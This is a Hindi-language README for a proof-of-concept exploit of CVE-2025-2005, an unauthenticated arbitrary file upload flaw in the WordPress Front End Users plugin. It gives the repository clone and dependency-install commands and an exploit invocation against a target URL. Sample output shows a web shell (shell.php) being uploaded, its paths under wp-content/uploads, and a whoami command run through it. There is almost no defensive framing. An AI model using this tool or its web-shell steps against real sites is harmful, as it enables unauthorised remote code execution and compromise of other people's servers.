
WordPress FEUP मनमाना फ़ाइल अपलोड एक्सप्लॉइट (CVE-2025-2005)
यह रिपॉज़िटरी WordPress Front End Users प्लगइन (संस्करण 3.2.32 तक) के लिए एक Proof of Concept (PoC) एक्सप्लॉइट प्रदान करती है, जो अपने पंजीकरण फ़ॉर्म में MIME/फ़ाइल-प्रकार सत्यापन की कमी के कारण मनमाना फ़ाइल अपलोड के लिए संवेदनशील है। यह बिना प्रमाणीकरण वाले हमलावरों को दुर्भावनापूर्ण फ़ाइलें (जैसे, वेब शेल) अपलोड करने की अनुमति देता है, जिससे संभावित रूप से सर्वर पर Remote Code Execution (RCE) हो सकता है।
/register/
/signup/
pip install requests beautifulsoup4
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005
python3 exploit.py --url http://target.com --user hacker --password pass123
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami